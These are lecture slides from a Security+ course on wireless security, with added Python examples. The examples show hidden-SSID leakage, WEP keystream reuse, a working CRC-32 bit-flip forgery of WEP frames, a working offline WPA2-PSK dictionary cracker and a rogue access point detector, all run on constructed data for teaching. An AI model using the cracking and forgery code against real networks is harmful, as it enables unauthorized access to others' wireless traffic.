ch06 wireless network security
DESCRIPTION
Security+ Guide to Network Security Fundamentals, 3rd Edition, by Mark Ciampa.
Knowledge and skills required for network administrators and information technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs).
CNIT 120: Network Security
http://samsclass.info/120/120_S09.shtml#lecture
Policy: http://samsclass.info/policy_use.htm
Many thanks to Sam Bowne for allowing us to publish these presentations.
TRANSCRIPT
Security+ Guide to Network Security Fundamentals, Third Edition
Chapter 6
Wireless Network Security
TJX Data Breach
TJX used WEP security
They lost 45 million customer records
They settled the lawsuits for $40.9 million
• Link Ch 6a
Objectives
Describe the basic IEEE 802.11 wireless security protections
Define the vulnerabilities of open system authentication, WEP, and device authentication
Describe the WPA and WPA2 personal security models
Explain how enterprises can implement wireless security
IEEE 802.11 Wireless Security Protections
Institute of Electrical and Electronics Engineers (IEEE)
In the early 1980s, the IEEE began work on developing computer network architecture standards
• This work was called Project 802
In 1990, the IEEE formed a committee to develop a standard for WLANs (Wireless Local Area Networks)
• At that time WLANs operated at a speed of 1 to 2 million bits per second (Mbps)
IEEE 802.11 WLAN Standard
In 1997, the IEEE approved the IEEE 802.11 WLAN standard
Revisions
• IEEE 802.11a
• IEEE 802.11b
• IEEE 802.11g
• IEEE 802.11n
Controlling Access to a WLAN
Access is controlled by limiting a device's access to the access point (AP)
Only devices that are authorized can connect to the AP
• One way: Media Access Control (MAC) address filtering
• CCSF uses this technique (unfortunately)
• See www.ccsf.edu/wifi
Controlling Access
MAC Address Filtering
Usually implemented by permitting listed addresses instead of blocking them (an allow list rather than a deny list)
• CCSF does this: www.ccsf.edu/wifi
Wired Equivalent Privacy (WEP)
Designed to ensure that only authorized parties can view transmitted wireless information
Uses encryption to protect traffic
WEP was designed to be:
• Efficient and reasonably strong
WEP Keys
WEP keys are marketed as 64 or 128 bits long
• Only 40 or 104 of those bits are the shared secret; the other 24 bits are the per-frame initialization vector (IV), which is transmitted in the clear
The AP and devices can hold up to four shared secret keys
• One of which must be designated as the default key
WEP Encryption Process
Transmitting with WEP
Device Authentication
Before a computer can connect to a WLAN, it must be authenticated
Types of authentication in 802.11
• Open system authentication
  - Lets everyone in
• Shared key authentication
  - Only lets computers in if they know the shared key
  - Caveat: the AP sends a cleartext challenge and the client returns it WEP-encrypted, so anyone sniffing the exchange obtains a plaintext/ciphertext pair (a keystream) and can answer later challenges without knowing the key; this makes it no stronger, and arguably weaker, than open system authentication
Vulnerabilities of IEEE 802.11 Security
Open system authentication
MAC address filtering
WEP
Open System Authentication
To connect, a computer needs the SSID (network name)
Access points normally send out beacon frames announcing the SSID
Passive scanning
• A wireless device listens for a beacon frame
Turning Off Beaconing
For "security" some people turn off SSID broadcasting (the AP still beacons, but with an empty SSID field)
• This annoys your legitimate users, who must now type in the SSID to connect
• It doesn't stop intruders, because the SSID is sent in the clear in other management frames anyway (probe requests, probe responses, and association requests)
• It can also affect roaming
• Windows XP prefers networks that broadcast
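Why a "hidden" SSID is not hidden, as an added example that is not part of the textbook or the course slides: the information-element parser below reads the SSID out of two constructed 802.11 management frame bodies, a beacon from an AP with SSID broadcast disabled (empty SSID element) and the probe response the same AP sends to any station that asks. The element IDs (0 for SSID, 3 for the DS parameter set / channel) and the 12-byte fixed-field prefix are from the standard; the frame contents, the network name and the channel are constructed for illustration.

```python
from typing import Dict, Optional

# Management frame body layout (IEEE 802.11): beacons and probe responses start
# with fixed fields (timestamp 8 B, beacon interval 2 B, capability 2 B), then a
# list of information elements, each "element ID | length | data".
FIXED_FIELDS_LEN = 12
SSID_ELEMENT_ID = 0
DS_PARAMETER_ELEMENT_ID = 3   # carries the channel number


def element(element_id: int, data: bytes) -> bytes:
    """Encode one information element."""
    return bytes([element_id, len(data)]) + data


def parse_elements(body: bytes) -> Dict[int, bytes]:
    """Walk the element list that follows the fixed fields.

    Stops at the first truncated element instead of trusting the remainder,
    which is the defensive choice for a parser fed by the air interface."""
    elements: Dict[int, bytes] = {}
    i = FIXED_FIELDS_LEN
    while i + 2 <= len(body):
        element_id, length = body[i], body[i + 1]
        data = body[i + 2 : i + 2 + length]
        if len(data) != length:           # malformed or truncated frame
            break
        elements.setdefault(element_id, data)   # keep the first occurrence
        i += 2 + length
    return elements


def ssid_of(body: bytes) -> Optional[str]:
    """Return the SSID, or None when the element is absent or empty ("hidden")."""
    ssid = parse_elements(body).get(SSID_ELEMENT_ID)
    if not ssid:
        return None
    return ssid.decode("utf-8", errors="replace")


def channel_of(body: bytes) -> Optional[int]:
    ds = parse_elements(body).get(DS_PARAMETER_ELEMENT_ID)
    return ds[0] if ds else None


# Constructed sample frames (not captures); fixed fields are zeroed for brevity.
# The AP has SSID broadcast disabled, so its beacon carries an empty SSID element...
HIDDEN_BEACON = (bytes(FIXED_FIELDS_LEN)
                 + element(SSID_ELEMENT_ID, b"")
                 + element(DS_PARAMETER_ELEMENT_ID, bytes([6])))
# ...but the probe response it returns to any probing station names the network.
PROBE_RESPONSE = (bytes(FIXED_FIELDS_LEN)
                  + element(SSID_ELEMENT_ID, b"corp-wlan")
                  + element(DS_PARAMETER_ELEMENT_ID, bytes([6])))

if __name__ == "__main__":
    print("beacon SSID:        ", ssid_of(HIDDEN_BEACON))    # None
    print("probe response SSID:", ssid_of(PROBE_RESPONSE))   # corp-wlan
    print("channel:            ", channel_of(PROBE_RESPONSE))
```

A passive sniffer only needs to wait for any legitimate client to probe or associate; an active one sends the probe request itself. Either way the name is recovered, which is why SSID hiding belongs under usability settings rather than security controls.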
MAC Address Filtering Weaknesses
MAC addresses are transmitted in the clear
• An attacker can just sniff for MACs
Managing a large number of MAC addresses is difficult
MAC address filtering does not provide a means to temporarily allow a guest user to access the network
• Other than manually entering the user's MAC address into the access point
WEP
To encrypt packets WEP can use only a 64-bit or 128-bit number
• Which is made up of a 24-bit initialization vector (IV) and a 40-bit or 104-bit default key
The 24-bit IV is too short, and repeats before long
• There are only about 16.7 million IVs; a busy network exhausts them in hours, and two frames encrypted under the same IV share the same RC4 keystream
In addition, packets can be replayed to force the access point to pump out IVs
Cracking WEP
With the right equipment, WEP can be cracked in just a few minutes
• You need a wireless card whose driver supports monitor mode and packet injection
• We do it in CNIT 123: Ethical Hacking and Network Defense
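What IV reuse actually costs, as an added example rather than code from the textbook or the course: the block below implements RC4 and the WEP construction (cleartext IV prepended, keystream from RC4(IV || secret key)), then shows that two frames sent under the same IV leak the XOR of their plaintexts, so a predictable header in one frame (an ARP or DHCP request, say) reveals the other frame outright. It also computes how fast the 24-bit IV space runs out. The key, IV and frame contents are constructed; the ICV is omitted because it plays no part in this property.

```python
import math


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes (key-scheduling then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret_key: bytes, iv: bytes, payload: bytes) -> bytes:
    """WEP frame body: cleartext 3-byte IV || RC4(IV || key)(payload).

    The keystream depends only on (IV, key), so a repeated IV under the same
    key reproduces the same keystream byte for byte."""
    assert len(iv) == 3 and len(secret_key) in (5, 13), "40- or 104-bit key"
    return iv + xor(payload, rc4(iv + secret_key, len(payload)))


def recover_with_known_plaintext(frame_a: bytes, frame_b: bytes,
                                 known_plaintext_a: bytes) -> bytes:
    """Two frames under one IV: c_a ^ c_b == p_a ^ p_b, with no key involved.
    Knowing p_a therefore yields p_b (as far as the known bytes extend)."""
    assert frame_a[:3] == frame_b[:3], "attack needs the same IV on both frames"
    return xor(xor(frame_a[3:], frame_b[3:]), known_plaintext_a)


def expected_frames_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound for randomly chosen IVs: ~sqrt(pi/2 * 2**iv_bits) frames."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)


def seconds_to_exhaust_ivs(frames_per_second: int, iv_bits: int = 24) -> float:
    """A sequential IV counter wraps after 2**iv_bits frames."""
    return 2 ** iv_bits / frames_per_second


if __name__ == "__main__":
    key = b"\x01\x02\x03\x04\x05"          # constructed 40-bit secret key
    iv = b"\x00\x00\x2a"                   # constructed IV, reused by the sender
    frame_a = wep_encrypt(key, iv, b"ARP-REQUEST-HDR:")   # predictable content
    frame_b = wep_encrypt(key, iv, b"password=hunter2")   # what the attacker wants
    print(recover_with_known_plaintext(frame_a, frame_b, b"ARP-REQUEST-HDR:"))
    print("frames until a random IV repeats: %.0f" % expected_frames_until_iv_repeat())
    print("seconds to wrap a sequential IV at 1000 fps: %.0f" % seconds_to_exhaust_ivs(1000))
```

Real attacks (FMS, KoreK, PTW) go further and recover the key itself from weak-IV statistics, which is what the "few minutes" figure refers to; the point here is that even the simplest reuse is already fatal for confidentiality.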
Personal Wireless Security
• WPA Personal Security
• WPA2 Personal Security
WPA Personal Security
Wireless Ethernet Compatibility Alliance (WECA)
• A consortium of wireless equipment manufacturers and software providers
WECA goals:
• To encourage wireless manufacturers to use the IEEE 802.11 technologies
• To promote and market these technologies
• To test and certify that wireless products adhere to the IEEE 802.11 standards to ensure product interoperability
WPA Personal Security
In 2002, the WECA organization changed its name to Wi-Fi (Wireless Fidelity) Alliance
In October 2003 the Wi-Fi Alliance introduced Wi-Fi Protected Access (WPA)
• WPA had the design goal to protect both present and future wireless devices, and addresses both wireless authentication and encryption
• PSK addresses authentication and TKIP addresses encryption
WPA Personal Security
Preshared key (PSK) authentication
• Uses a passphrase to generate the encryption key
• Key must be entered into both the access point and all wireless devices prior to the devices communicating with the AP
The PSK is not used for encryption
• Instead, it serves as the starting point (seed) for mathematically generating the encryption keys
Temporal Key Integrity Protocol (TKIP)
WPA replaces WEP with TKIP
TKIP advantages:
• TKIP uses a longer 128-bit temporal key, and a 48-bit sequence counter in place of WEP's 24-bit IV
• TKIP mixes the temporal key with the transmitter address and the sequence counter to derive a fresh RC4 key for each packet
Message Integrity Check (MIC)
WPA also replaces the CRC function in WEP with the Message Integrity Check (MIC)
• Designed to prevent an attacker from capturing, altering, and resending data packets
• See link Ch 6b
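Why the CRC had to go, as an added example (not the textbook's or the course's code): WEP appends a CRC-32 integrity check value (ICV) and then XORs everything with a stream-cipher keystream. XOR passes straight through a stream cipher, and CRC-32 is affine, so an attacker who knows nothing about the key can flip chosen plaintext bits in a captured frame and patch the encrypted ICV so the receiver still accepts it. The block contrasts that with a keyed MIC, which the attacker cannot recompute. Assumptions: a random byte string stands in for the RC4/TKIP keystream, and HMAC-SHA1 truncated to 8 bytes stands in for TKIP's real Michael MIC; the plaintext and the bit flip are constructed.

```python
import hashlib
import hmac
import os
import zlib


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- WEP style: CRC-32 ICV appended, then the whole thing XORed with keystream ---
def wep_protect(keystream: bytes, plaintext: bytes) -> bytes:
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return xor(plaintext + icv, keystream)


def wep_verify(keystream: bytes, frame: bytes):
    data = xor(frame, keystream)
    body, icv = data[:-4], data[-4:]
    return zlib.crc32(body).to_bytes(4, "little") == icv, body


def forge_wep_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Flip chosen plaintext bits without the key or the keystream.

    For equal-length inputs CRC-32 satisfies
        crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros),
    so XORing crc(d) ^ crc(zeros) into the encrypted ICV keeps it valid."""
    zeros = bytes(len(delta))
    icv_delta = (zlib.crc32(delta) ^ zlib.crc32(zeros)).to_bytes(4, "little")
    return xor(frame, delta + icv_delta)


# --- WPA style: the ICV is replaced by a MIC keyed with a secret the attacker lacks.
#     TKIP really uses the Michael algorithm; HMAC-SHA1 stands in for it here. ---
MIC_LEN = 8


def mic_protect(keystream: bytes, mic_key: bytes, plaintext: bytes) -> bytes:
    mic = hmac.new(mic_key, plaintext, hashlib.sha1).digest()[:MIC_LEN]
    return xor(plaintext + mic, keystream)


def mic_verify(keystream: bytes, mic_key: bytes, frame: bytes):
    data = xor(frame, keystream)
    body, mic = data[:-MIC_LEN], data[-MIC_LEN:]
    expected = hmac.new(mic_key, body, hashlib.sha1).digest()[:MIC_LEN]
    return hmac.compare_digest(expected, mic), body


def demo():
    """Returns (wep_accepted, wep_body_as_seen_by_receiver, mic_accepted)."""
    keystream = os.urandom(64)      # the attacker never learns this
    mic_key = os.urandom(16)
    plaintext = b"ADMIN=0;CMD=LIST"  # constructed 16-byte payload
    # Flip '0' -> '1' at offset 6 ('0' ^ '1' == 0x01); every other byte untouched.
    delta = bytes(6) + b"\x01" + bytes(len(plaintext) - 7)

    forged_wep = forge_wep_bitflip(wep_protect(keystream, plaintext), delta)
    wep_ok, wep_body = wep_verify(keystream, forged_wep)

    forged_mic = xor(mic_protect(keystream, mic_key, plaintext), delta + bytes(MIC_LEN))
    mic_ok, _ = mic_verify(keystream, mic_key, forged_mic)
    return wep_ok, wep_body, mic_ok


if __name__ == "__main__":
    ok, body, mic_ok = demo()
    print("WEP receiver accepted forged frame:", ok, body)   # True b'ADMIN=1;CMD=LIST'
    print("MIC receiver accepted forged frame:", mic_ok)     # False
```

Michael itself is a much weaker MIC than an HMAC (it was chosen so WEP-era hardware could compute it), which is why WPA pairs it with countermeasures that rekey after MIC failures and with a replay counter; the structural point, that integrity must be keyed and not linear in the message, is the same.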
WPA2 Personal Security
Wi-Fi Protected Access 2 (WPA2)
• Introduced by the Wi-Fi Alliance in September 2004
• The second generation of WPA security
• Still uses PSK (Pre-Shared Key) authentication
• But instead of TKIP encryption it uses a stronger data encryption method called AES-CCMP
WPA2 Personal Security
PSK Authentication
• Intended for personal and small office home office users who do not have advanced server capabilities
• The temporal keys derived from the PSK (not the PSK itself) are automatically regenerated and re-authenticated between devices after a specified period of time known as the rekey interval
PSK Key Management Weaknesses
People may send the key by e-mail or another insecure method
Changing the PSK key is difficult
• Must type new key on every wireless device and on all access points
• In order to allow a guest user to have access to a PSK WLAN, the key must be given to that guest
Pre-Shared Key Weakness
A PSK is a 256-bit number (written as 64 hexadecimal digits)
• Usually generated from a passphrase consisting of letters, digits, punctuation, etc. that is between 8 and 63 characters in length
• The derivation (PBKDF2 with the SSID as salt) is deterministic, so anyone who captures one handshake can test passphrase guesses offline, with no further contact with the network
If the passphrase is a common word, it can be found with a dictionary attack
Cracking WPA
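How the dictionary attack works end to end, as an added example that is not the textbook's or the course's code: the block derives the PMK from a passphrase and SSID exactly as WPA/WPA2-Personal does (PBKDF2-HMAC-SHA1, 4096 iterations, 256-bit output), expands it with the 802.11i PRF into the PTK using the two MAC addresses and two nonces seen in the 4-way handshake, and checks candidate passphrases against the MIC on handshake message 2. The HMAC-SHA1 MIC is the WPA2/CCMP variant (WPA/TKIP uses HMAC-MD5 and a longer PTK). The MAC addresses, nonces, EAPOL-Key bytes and word list are constructed, and the "capture" is produced by playing the legitimate supplicant; a known-answer vector from IEEE 802.11 Annex H ("password" / "IEEE") checks the PMK step.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK from the handshake inputs; its first 16 bytes are the Key
    Confirmation Key (KCK), which authenticates the EAPOL-Key messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_frame_with_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
              eapol: bytes, captured_mic: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: every input except the passphrase is in the capture."""
    for guess in wordlist:
        try:
            pmk = pmk_from_passphrase(guess, ssid)
        except ValueError:          # shorter than 8 chars cannot be a valid PSK
            continue
        kck = kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return guess
    return None


# Constructed handshake (assumption: stands in for a real capture). The EAPOL-Key
# body is a placeholder byte string rather than a fully encoded frame.
SSID = "corp-wlan"
AP_MAC = bytes.fromhex("001122334401")
STA_MAC = bytes.fromhex("aabbccddeeff")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = b"EAPOL-Key message 2 with MIC field zeroed" + bytes(16)


def build_capture(real_passphrase: str) -> bytes:
    """Play the legitimate supplicant: produce the MIC an attacker would sniff."""
    pmk = pmk_from_passphrase(real_passphrase, SSID)
    return eapol_mic(kck_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE), EAPOL_MSG2)


if __name__ == "__main__":
    mic = build_capture("password")          # the network's weak passphrase
    print(crack_psk(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MSG2, mic,
                    ["letmein", "123456", "password", "correct horse battery staple"]))
```

Each guess costs 4096 HMAC-SHA1 iterations, which slows a CPU to a few thousand guesses per second but is trivially parallel on GPUs; the only defences are a long random passphrase (the derivation cannot be made slower by the user) or moving to 802.1X, where no shared secret exists to guess.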
WPA2 Personal Security (continued)
AES-CCMP Encryption
• Encryption under the WPA2 personal security model is accomplished by AES-CCMP
• AES-CCMP is computationally heavier than the RC4-based WEP and TKIP, so WEP-era access points generally lacked the hardware to run it and had to be replaced rather than upgraded by firmware
WPA and WPA2 Compared
Enterprise Wireless Security
Two models:
IEEE 802.11i
WPA and WPA2 models
IEEE 802.11i
Improves encryption and authentication
Encryption
• Replaces WEP's RC4 stream cipher (used as a pseudo-random number generator)
• With the AES block cipher, which processes every 128-bit block of plaintext in CCMP mode (counter mode for confidentiality plus CBC-MAC for integrity)
IEEE 802.11i
IEEE 802.11i authentication and key management is accomplished by the IEEE 802.1X standard
802.1X Authentication
IEEE 802.11i (continued)
Key-caching
• Remembers a client, so if a user roams away from a wireless access point and later returns, she does not need to re-enter her credentials
Pre-authentication
• Allows a device to become authenticated to an AP before moving into range of the AP
• Authentication packet is sent ahead
WPA Enterprise Security
Designed for medium to large-size organizations
Improved authentication and encryption
The authentication used is IEEE 802.1X and the encryption is TKIP
WPA Enterprise Security (continued)
IEEE 802.1X Authentication
• Provides an authentication framework for all IEEE 802-based LANs
• Does not perform any encryption
TKIP Encryption
• An improvement on WEP encryption
• Designed to fit into the existing WEP procedure
WPA2 Enterprise Security
The most secure method of those covered here
Authentication uses IEEE 802.1X
Encryption is AES-CCMP
Enterprise and Personal Wireless Security Models
Enterprise Wireless Security Devices
Thin Access Point
• An access point without the authentication and encryption functions
• These features reside on the wireless switch (controller)
Advantages
• The APs can be managed from one central location
• All authentication is performed in the wireless switch
Enterprise Wireless Security Devices (continued)
Wireless VLANs
• Can segment traffic and increase security
• The flexibility of a wireless VLAN depends on which device separates the packets and directs them to different networks
Enterprise Wireless Security Devices (continued)
For enhanced security, set up two wireless VLANs
• One for employee access
• One for guest access
Rogue Access Point Discovery Tools
Wireless protocol analyzer
• Auditors carry it around sniffing for rogue access points
For more security, set up wireless probes to monitor the RF spectrum continuously
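What a probe's back end does with what it hears, as an added example that is not from the textbook or the course: the block takes scan records (a constructed `key=value` line format, not any vendor's) and compares each observed BSSID against an authorized-AP inventory, separating an evil twin (our SSID on a radio we do not own) from a weakened corporate AP (right BSSID and SSID, wrong security mode) and from unknown neighbours, then ranks the unknowns by signal strength because the strongest ones are the likeliest to be inside the building. The inventory, SSIDs and scan lines are all constructed.

```python
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class Observation:
    bssid: str
    ssid: str
    channel: int
    security: str   # e.g. OPEN, WEP, WPA-PSK, WPA2-PSK, WPA2-EAP
    rssi: int       # dBm; closer to 0 is stronger


def parse_scan_line(line: str) -> Observation:
    """Parse one 'key=value ...' scan record (constructed format for this example)."""
    fields = dict(token.split("=", 1) for token in line.split())
    return Observation(fields["bssid"].lower(), fields["ssid"], int(fields["channel"]),
                       fields["sec"].upper(), int(fields["rssi"]))


def classify(obs: Observation, inventory: Dict[str, Tuple[str, str]],
             corporate_ssids: Set[str]) -> str:
    entry = inventory.get(obs.bssid)
    if entry is None:
        # Our network name on a radio we do not own: evil twin / rogue AP.
        return "EVIL_TWIN" if obs.ssid in corporate_ssids else "UNKNOWN"
    expected_ssid, expected_security = entry
    if obs.ssid != expected_ssid:
        return "MISCONFIGURED"
    if obs.security != expected_security:
        return "WEAKENED"       # e.g. a corporate AP switched to WEP or open
    return "AUTHORIZED"


def triage(scan_lines: List[str], inventory: Dict[str, Tuple[str, str]],
           corporate_ssids: Set[str]) -> Dict[str, List[Observation]]:
    findings: Dict[str, List[Observation]] = {}
    for line in scan_lines:
        obs = parse_scan_line(line)
        findings.setdefault(classify(obs, inventory, corporate_ssids), []).append(obs)
    return findings


def most_likely_inside(findings: Dict[str, List[Observation]]) -> List[Observation]:
    """Unknown APs, strongest signal first: the ones to go and physically locate."""
    return sorted(findings.get("UNKNOWN", []), key=lambda o: o.rssi, reverse=True)


# Constructed inventory: BSSID -> (expected SSID, expected security mode).
INVENTORY = {
    "00:11:22:33:44:01": ("corp-wlan", "WPA2-EAP"),
    "00:11:22:33:44:02": ("corp-wlan", "WPA2-EAP"),
    "00:11:22:33:44:03": ("corp-guest", "WPA2-PSK"),
}
CORPORATE_SSIDS = {"corp-wlan", "corp-guest"}

# Constructed scan output from one probe.
SCAN = [
    "bssid=00:11:22:33:44:01 ssid=corp-wlan channel=1 sec=WPA2-EAP rssi=-41",
    "bssid=00:11:22:33:44:02 ssid=corp-wlan channel=6 sec=WPA2-EAP rssi=-55",
    "bssid=00:11:22:33:44:03 ssid=corp-guest channel=11 sec=WEP rssi=-50",
    "bssid=de:ad:be:ef:00:01 ssid=corp-wlan channel=6 sec=OPEN rssi=-38",
    "bssid=66:77:88:99:aa:bb ssid=linksys channel=6 sec=WPA2-PSK rssi=-47",
    "bssid=c0:ff:ee:00:00:01 ssid=CoffeeShop channel=1 sec=OPEN rssi=-82",
]

if __name__ == "__main__":
    findings = triage(SCAN, INVENTORY, CORPORATE_SSIDS)
    for verdict, observations in sorted(findings.items()):
        for o in observations:
            print(f"{verdict:13} {o.bssid} {o.ssid!r} ch{o.channel} {o.security} {o.rssi} dBm")
    print("locate first:", [o.bssid for o in most_likely_inside(findings)])
```

A single probe cannot tell "inside" from "next door"; a fixed-probe deployment with known positions can compare RSSI across probes to trilaterate, which is the advantage of dedicated probes over an auditor with a laptop.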
Types of Wireless Probes
• Wireless device probe
• Desktop probe
• Access point probe
• Dedicated probe